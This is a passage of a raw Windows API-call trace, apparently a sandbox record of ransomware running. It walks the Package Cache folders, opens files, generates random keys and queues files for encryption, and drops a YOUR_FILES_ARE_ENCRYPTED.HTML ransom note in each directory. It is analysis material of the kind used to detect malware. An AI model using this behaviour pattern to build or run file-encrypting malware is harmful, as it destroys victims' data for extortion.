lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0158.233] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*" [0158.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0158.234] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.234] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99d3130, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99d3130, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0158.234] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned 115 [0158.234] GetProcessHeap () returned 0x270000 [0158.234] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0158.237] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0158.237] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*" [0158.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, 
ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99d3130, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99d3130, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0158.237] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99d3130, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99d3130, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.237] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa960e00, ftCreationTime.dwHighDateTime=0x1ced524, ftLastAccessTime.dwLowDateTime=0xfa960e00, ftLastAccessTime.dwHighDateTime=0x1ced524, ftLastWriteTime.dwLowDateTime=0xfa960e00, ftLastWriteTime.dwHighDateTime=0x1ced524, nFileSizeHigh=0x0, nFileSizeLow=0x4ea418, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0158.237] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0158.237] lstrcmpW (lpString1="cab1.cab", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.237] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.237] lstrlenW (lpString=".cab") returned 4 [0158.237] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.237] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: 
RandomBuffer=0x4ebd7ec) returned 1 [0158.238] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0158.238] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=5153816) returned 1 [0158.238] GetProcessHeap () returned 0x270000 [0158.238] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0158.244] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="AD") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="79") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="7E") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="1F") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="B7") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="62") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="8B") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="CE") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="AF") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="E4") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="8C") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="00") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="18") returned 2 [0158.244] wsprintfW (in: 
param_1=0x4ebd75e, param_2="%02X" | out: param_1="BD") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="D3") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="79") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="73") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="0C") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="62") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="A1") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="43") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="42") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="B8") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="12") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="4A") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="CB") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="AD") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="E2") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="99") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="C8") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="09") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="58") returned 2 [0158.246] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package 
Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0158.246] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0158.246] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0158.246] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0158.246] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0158.246] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.246] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0158.246] lstrlenW (lpString=".msi") returned 4 [0158.246] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0158.246] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, 
ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0158.246] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0158.247] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0158.247] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0158.477] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0158.480] CloseHandle (hObject=0x4a8) returned 1 [0158.481] GetProcessHeap () returned 0x270000 [0158.482] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0158.482] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99d3130, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99d3130, ftLastWriteTime.dwHighDateTime=0x1d706a5, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0158.482] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0158.483] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0158.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0158.483] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0158.486] CloseHandle (hObject=0x598) returned 1 [0158.486] GetProcessHeap () returned 0x270000 [0158.487] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0158.487] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0158.487] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.488] 
wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0158.488] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.488] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.491] CloseHandle (hObject=0x58c) returned 1 [0158.491] GetProcessHeap () returned 0x270000 [0158.492] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.498] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf993abb0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", cAlternateFileName="{BD95A~1.610")) returned 1 [0158.498] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned 82 [0158.498] GetProcessHeap () returned 0x270000 [0158.498] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 
0x74ea160 [0158.500] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0158.500] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*" [0158.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf993abb0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.501] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf993abb0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.502] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0158.502] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned 91 [0158.502] GetProcessHeap () returned 0x270000 [0158.502] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0158.503] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0158.503] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*" [0158.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0158.503] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.503] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0158.503] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned 112 [0158.503] GetProcessHeap () returned 0x270000 [0158.503] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.505] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" 
[0158.506] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*" [0158.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, 